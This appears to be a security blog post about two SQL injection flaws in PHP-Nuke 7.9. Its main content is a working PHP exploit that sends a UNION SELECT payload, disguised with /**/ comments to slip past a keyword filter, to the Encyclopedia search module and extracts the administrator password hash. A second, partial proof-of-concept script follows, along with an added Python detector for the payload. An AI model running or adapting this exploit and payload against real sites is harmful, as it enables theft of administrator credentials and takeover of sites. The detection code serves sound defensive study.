Two vulnerabilities were found in the latest version of PHP-Nuke (7.9). They were discovered by an Argentine colleague (Paisterist.nst), and the corresponding exploits are already publicly available.

PHP Nuke <= 7.9 SQL Injection and Bypass SQL Injection Protection vulnerabilities
PHP-Nuke <= 7.9 Search module "author" SQL Injection vulnerability

PHP Nuke <= 7.9 SQL Injection and Bypass SQL Injection Protection vulnerabilities exploit

<?php
/*
Neo Security Team - Exploit made by Paisterist on 2006-10-22
http://www.neosecurityteam.net
*/
$host = "localhost";
$path = "/phpnuke/";
$port = "80";
$fp = fsockopen($host, $port, $errno, $errstr, 30);
// POST body: the injection is carried in the "eid" parameter
$data = "query=fooaa&eid=foo'/**/UNION SELECT pwd as title FROM nuke_authors WHERE '1'='1";
$content = "";

if ($fp) {
    // Build the raw HTTP request for the Encyclopedia search page
    $p  = "POST ".$path."modules.php?name=Encyclopedia&file=search HTTP/1.0\r\n";
    $p .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*\r\n";
    $p .= "Referer: http://$host".$path."modules.php?name=Encyclopedia&file=search\r\n";
    $p .= "Accept-Language: es-ar\r\n";
    $p .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $p .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
    $p .= "Host: $host\r\n";
    $p .= "Content-Length: ".strlen($data)."\r\n";
    $p .= "Pragma: no-cache\r\n";
    $p .= "Connection: keep-alive\r\n\r\n";
    $p .= $data;

    fwrite($fp, $p);

    // Read the whole response
    while (!feof($fp)) {
        $content .= fread($fp, 4096);
    }

    // Look for a 32-character alphanumeric string (the password hash) in the response
    preg_match("/([a-zA-Z0-9]{32})/", $content, $matches);

    print "<b>Hash: </b>".$matches[0];
}
?>
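
Added example (not part of the original post or of the Neo Security Team code): a Python check a defender could run over logged POST bodies to spot the "eid" payload shown above, compared with a space-delimited keyword blacklist. `naive_filter` is a hypothetical blacklist used for illustration, not PHP-Nuke's actual protection code, and the sample bodies are constructed.

```python
import re
from urllib.parse import parse_qsl

UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b")

def naive_filter(value: str) -> bool:
    """Hypothetical blacklist: the keyword surrounded by literal spaces."""
    return " union " in value.lower()

def normalize(value: str) -> str:
    """Turn SQL comment delimiters into spaces and collapse whitespace, so
    foo'/**/UNION SELECT is inspected the way the SQL parser tokenizes it."""
    value = re.sub(r"/\*|\*/", " ", value.lower())
    return re.sub(r"\s+", " ", value)

def suspicious_params(body: str) -> list[str]:
    """Names of form fields whose decoded, normalized value holds UNION SELECT."""
    return [name for name, value in parse_qsl(body, keep_blank_values=True)
            if UNION_SELECT.search(normalize(value))]

def naive_params(body: str) -> list[str]:
    """Names of form fields that the hypothetical blacklist would flag."""
    return [name for name, value in parse_qsl(body, keep_blank_values=True)
            if naive_filter(value)]

# Constructed sample POST bodies (not real traffic).
SAMPLE_BODIES = [
    # benign search that happens to contain the word "union"
    "query=trade+union+history&eid=12",
    # body sent by the exploit quoted above
    "query=fooaa&eid=foo'/**/UNION SELECT pwd as title FROM nuke_authors WHERE '1'='1",
    # URL-encoded variant of the same pattern
    "query=fooaa&eid=foo%27%2F%2A%2A%2FUNION%20SELECT%20pwd%20FROM%20nuke_authors",
    # benign text with both keywords, but not as a UNION SELECT construct
    "query=select+a+union+rep&eid=7",
]

if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(f"naive={naive_params(body)!s:10} "
              f"normalized={suspicious_params(body)!s:10} {body[:60]}")
```

The blacklist flags the two benign searches and misses both injected bodies, while the normalized check flags only the "eid" field of the injected ones.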

PHP-Nuke <= 7.9 Search module "author" SQL Injection vulnerability Exploit

<?php
/*
Neo Security Team - Pseudo-Code Proof of Concept Exploit
http://www.neosecurityteam.net
Paisterist
*/
set_time_limit(0);
$host = "localhost";
$path = "/phpnuke/";
$port = "80";
$fp = fsockopen($host, $port, $errno, $errstr, 30);
$data = ""; /* Here the variables, like "query", "topic" and "author" with the SQL Injection */
$content = "";

if ($fp) {
    /* we put the POST request on $p variable, sending the data saved on $data. */

    fwrite($fp, $p);

    // Read the whole response
    while (!feof($fp)) {
        $content .= fread($fp, 4096);
    }

    // Look for a 32-character alphanumeric string (the password hash) in the response
    preg_match("/([a-zA-Z0-9]{32})/", $content, $matches);

    if ($matches[0]) print "<b>Hash: </b>".$matches[0];
}
?>

For more information, visit:
http://www.neosecurityteam.net/index.php?action=advisories&id=27
http://www.neosecurityteam.net/index.php?action=advisories&id=28